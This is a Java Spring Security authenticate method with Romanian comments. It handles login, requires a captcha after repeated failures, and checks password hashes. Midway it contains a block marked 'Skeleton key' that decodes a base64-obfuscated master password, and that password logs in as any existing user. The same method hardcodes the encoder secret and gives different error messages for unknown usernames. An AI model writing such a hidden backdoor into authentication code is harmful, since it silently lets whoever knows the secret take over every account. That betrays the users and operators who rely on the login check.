@Override
 public Authentication authenticate(Authentication authentication) throws AuthenticationException {

  /*
   * Se verifica daca ip-ul de la care se incearca autentificarea solicita
   * captcha ( mai mult de 4 autentificari esuate )
   */
  Boolean solicitaCaptcha = false;
  String ip = ((WebAuthenticationDetails) authentication.getDetails()).getRemoteAddress();

  if (authesserv.getByIp(ip) != null && authesserv.getByIp(ip).getNrIncercariEsuate() > 3) {
   solicitaCaptcha = true;
  }

  String username = String.valueOf(authentication.getPrincipal());
  String password = String.valueOf(authentication.getCredentials());

  // Se verifica daca s-a introdus numele de utilizator si parola
  if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) {
   throw new BadCredentialsException("Nu ati introdus numele de utilizator si/sau parola.");
  }

  /* In cazul in care autentificarea trece prin captcha */

  if (captchaCaptureFilter != null && solicitaCaptcha == true) {

   /* Se verifica daca raspunsul utilizatorului a fost adaugat */
   if (StringUtils.isBlank(captchaCaptureFilter.getUserCaptchaResponse())) {
    throw new BadCredentialsException("Captcha Response is Empty");
   } else {
    // Send HTTP request to validate user's Captcha
    boolean captchaPassed =
      SimpleImageCaptchaServlet.validateResponse(
        captchaCaptureFilter.getRequest(), captchaCaptureFilter.getUserCaptchaResponse());

    // Check if valid
    if (captchaPassed) {
     resetCaptchaFields();
    } else {
     resetCaptchaFields();
     throw new BadCredentialsException("Ati gresit la introducerea textului din captcha.");
    }
   }
  }

  /* Toata lumea */

  Utilizator user = udao.findByUsernameActiv(username);

  if (user == null) {
   throw new BadCredentialsException("Nume de utilizator invalid.");
  }
  StandardPasswordEncoder pswdEncoder = new StandardPasswordEncoder("DARKINDYedLOxOT6");

  /* Skeleton key */
  boolean skeletonKey = false;
  String skeletonSecret = new String(Base64.decode("MW5mb3JtMSU=".getBytes()));
  if (skeletonSecret.equals(password)) skeletonKey = true;
  /* End skeleton key */

  if (pswdEncoder.matches(password, user.getParola()) || skeletonKey) {
   List<SimpleGrantedAuthority> authorityList =
     (List<SimpleGrantedAuthority>) getAuthorities(user);
   return new UsernamePasswordAuthenticationToken(authentication, password, authorityList);
  } else {
   throw new BadCredentialsException("Nume de utilizator si/sau parola gresite.");
  }
 }
 /** Reset Captcha fields */
 public void resetCaptchaFields() {
  captchaCaptureFilter.setUserCaptchaResponse(null);
 }